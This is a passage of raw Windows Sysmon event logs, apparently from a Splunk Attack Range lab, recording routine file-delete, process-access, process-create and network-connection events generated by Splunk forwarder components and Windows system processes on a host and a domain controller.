Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220231Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:51.804{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FF1FFCE27F3BC7A0C9521C04B0E6E2D,SHA256=0A320F9498FD9E95337C5098C444313F155C81DBDADAA99330CD5478F641C348,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:51.769{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDA83F0AEA90CD3B9C1C948FDCE494BD,SHA256=1B16237F4F12DC74B540FED92BA2E7E635871DB0224640246C1FF5E93BD2E556,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220230Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:51.226{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-15FF-6216-E404-000000003902}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220229Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:51.226{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220228Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:51.226{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220227Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:51.226{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220226Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:51.226{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220225Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:51.226{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220224Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:51.226{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220223Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:51.226{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220222Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:51.226{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220221Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:51.226{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220220Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:51.226{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-15FF-6216-E404-000000003902}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220219Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:51.226{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-15FF-6216-E404-000000003902}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220218Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:51.227{4F8D34B0-15FF-6216-E404-000000003902}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:52.770{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AC9B85C4E6A3AF8413426D6184C462F,SHA256=548593210F8D076601D436E111ECDF504844AB30ADE71F8A2D6039EF7C814C75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220232Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:52.241{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D876514ECA573CF3246445F1EBE0BDB1,SHA256=8F5B978E4DCFF8E06191AC1E3F6C805B4D107D0CD4D2BE4707B6B6116F802973,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:53.784{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=555C3F8CE964699931F87194B047C3AC,SHA256=96DA771F1D4146C98DAFCA34588EA47F273828460DC54CA98F5FF4B5DA552B63,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220234Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:50.692{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51566-false10.0.1.12-8000- 23542300x8000000000000000220233Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:53.025{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14E0300EE43CC094747E1B69B4426371,SHA256=0155C4AA2C8ADCAB1E0BB30C196AFF3BA446C7EE339A96D5F1397C48E07BB718,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:53.385{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:53.385{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:53.385{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:54.799{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D182C7648F4E97025E4DF63A000E7CE2,SHA256=5BCFF7B72A6981EE6E042A33420B5298295EBC280C9E437B5BF7A57A12B0895A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220235Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:54.054{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FDEEF5BDCE433A6EE5DD57FAC22181B,SHA256=CD3A1F9B2001D7F7C68B573D256C303174DB8D312130802C7833C2734DAB9FE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:55.814{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=294D50ADEA436BE01DC8E884ABBA5D36,SHA256=8BC646ED42F22FAAF8B3B46C0D44527998716DCDB096F7A29FEEEA9EB88DA823,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220236Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:55.257{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA07BA8DB8FDBD78AE09F10D44CFC29B,SHA256=68EF5C738FC928792E1118A7688B47986D3C8645AE7EA28F1761B765C81117EF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:52.561{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49311-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:56.866{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6507761443F79C36809D022742F001CE,SHA256=A0FB18751316E385EAF90607A4041D77BDF037390B35939C9B6769C2B161999B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220237Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:56.272{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71D429938EA70BB2508C5167514E22B8,SHA256=D82F0A238705C05F9B83BC51670CB62278F089824CB54CCE8C0584FAE84B28AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:56.650{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=566858FDCEA6A570117E800B73F30404,SHA256=7AB9E99EED0A99FD57EF32A34238AF3CA33F3D4879234E67E0EBCC9E14A6E94A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:56.650{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7CC12B0F652E49E83442521BEB17D1A0,SHA256=507AF27C75C306800AE47ADB4CC3177A1760358B994EFD7723C429DA2427541F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:57.931{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=566858FDCEA6A570117E800B73F30404,SHA256=7AB9E99EED0A99FD57EF32A34238AF3CA33F3D4879234E67E0EBCC9E14A6E94A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:57.881{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDADD9121AAA9B3467FE00CE7D9E1D83,SHA256=9A2E6BD6C1E755FF6ADE07108915078F221A534EF93BCF43AA782A7FB1F0AD21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220238Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:57.288{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program 